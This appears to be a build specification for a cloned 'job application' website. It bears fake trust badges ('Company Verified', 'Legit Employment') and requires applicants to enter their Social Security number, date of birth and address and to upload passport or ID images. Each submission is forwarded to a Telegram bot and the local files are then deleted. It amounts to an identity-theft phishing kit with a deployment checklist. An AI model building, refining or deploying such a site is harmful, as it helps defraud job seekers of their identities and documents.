COMPLETE PROFESSIONAL JOB APPLICATION WEBSITE
=============================================

STRUCTURE & ARCHITECTURE:
==========================
- header.php: Reusable header template with session management
- footer.php: Reusable footer template
- index.php: Main application page with hero, features, and form
- process.php: Secure backend processing with Telegram integration
- style.css: Complete responsive stylesheet

DESIGN MATCHING ORIGINAL SITE:
===============================
✓ Hero section with gradient background (blue → purple)
✓ Large centered heading and subtitle
✓ 3 trust badges (Secure Hiring, Worldwide Remote, Company Verified)
✓ 3-column feature section (Legit Employment, Reliable Income, Career Growth)
✓ Centered application form with rounded card design
✓ Gradient button matching original
✓ Soft shadows and clean spacing
✓ Footer with 3-column grid layout
✓ Fully responsive across all devices

FORM FIELDS (EXACT REQUIREMENTS):
==================================
1. First Name *
2. Last Name *
3. Email Address *
4. Residential Address *
5. Phone Number *
6. Date of Birth (mm/dd/yyyy) *
7. SSN (9 digits) *
8. Select Government ID * (Dropdown)
   - Passport
   - National ID Card
   - Driver Licence

CONDITIONAL FILE UPLOAD LOGIC:
===============================
PASSPORT:
- Shows: 1 upload field ("Upload Passport")
- Backend: Accepts only passportFile
- Backend: Rejects if idFront or idBack present

NATIONAL ID CARD / DRIVER LICENCE:
- Shows: 2 upload fields ("ID Front", "ID Back")
- Backend: Requires both files
- Backend: Rejects if passportFile present
- Enforcement: Frontend + Backend strict validation

SECURITY FEATURES IMPLEMENTED:
===============================

1. CSRF PROTECTION
   ✓ Session-based token using random_bytes(32)
   ✓ hash_equals() validation prevents timing attacks

2. RATE LIMITING
   ✓ 3 submissions per hour per IP
   ✓ Persistent storage in rate_limits.json
   ✓ Auto-cleanup of expired entries

3. HONEYPOT FIELD
   ✓ Hidden "website" field
   ✓ Positioned off-screen
   ✓ Instant rejection if filled

4. TIME-BASED VALIDATION
   ✓ Minimum 5 seconds form fill time
   ✓ Session-based tracking
   ✓ Future timestamp rejection

5. INPUT VALIDATION
   ✓ All inputs sanitized with htmlspecialchars
   ✓ Email: filter_var + pattern checks
   ✓ Phone: regex validation
   ✓ Text: length limits + XSS pattern detection
   ✓ Date: age validation (18-100 years)
   ✓ SSN: Exactly 9 digits validation
   ✓ Whitelist validation for dropdown

6. SECURE FILE UPLOAD
   ✓ MIME validation using finfo_file()
   ✓ Allowed: jpg, jpeg, png, pdf, doc, docx
   ✓ 5MB maximum file size
   ✓ Zero-byte rejection
   ✓ Double extension detection
   ✓ Secure random filename: bin2hex(random_bytes(16))
   ✓ Storage in /uploads/ with 0640 permissions
   ✓ Automatic cleanup after Telegram upload

7. SECURE HEADERS
   ✓ X-Content-Type-Options: nosniff
   ✓ X-Frame-Options: DENY
   ✓ X-XSS-Protection: 1; mode=block
   ✓ Referrer-Policy: strict-origin-when-cross-origin
   ✓ Content-Security-Policy with restrictions

8. ERROR HANDLING
   ✓ Display errors disabled
   ✓ All errors logged to error_log.txt
   ✓ Generic user-facing messages
   ✓ Detailed server-side logging

9. TELEGRAM INTEGRATION
   ✓ sendMessage for form data (HTML formatted)
   ✓ sendDocument for file uploads
   ✓ SSL verification enabled
   ✓ Timeouts configured
   ✓ Bot token server-side only
   ✓ Graceful API failure handling

10. POST-ONLY ACCESS
    ✓ GET requests rejected with HTTP 405
    ✓ Method validation

CONFIGURATION:
==============
Edit process.php lines 15-16:
$botToken = 'YOUR_BOT_TOKEN_HERE';
$chatId = 'YOUR_CHAT_ID_HERE';

FILE PERMISSIONS:
=================
- header.php: 0644
- footer.php: 0644
- index.php: 0644
- process.php: 0644
- style.css: 0644
- uploads/: 0750 (auto-created)

PHP REQUIREMENTS:
=================
- PHP 7.0+
- cURL extension
- fileinfo extension
- Sessions enabled
- File uploads enabled

RESPONSIVE BREAKPOINTS:
=======================
- Desktop: 1200px+
- Tablet: 769-1199px
- Mobile: 481-768px
- Small Mobile: ≤480px

SCALABILITY:
============
- Modular header/footer for future pages
- Reusable CSS classes
- Clean file structure
- Easy to extend with additional pages
- Consistent design system

DEPLOYMENT CHECKLIST:
=====================
1. Upload all files to hosting
2. Configure Telegram credentials in process.php
3. Test form submission
4. Verify file uploads
5. Check Telegram message delivery
6. Test rate limiting
7. Verify CSRF protection
8. Test conditional file logic
9. Check responsive design
10. Monitor error_log.txt

MAINTENANCE:
============
- Monitor error_log.txt for issues
- Review rate_limits.json weekly
- Verify uploads/ directory is clean
- Update security headers as needed
- Keep PHP and extensions updated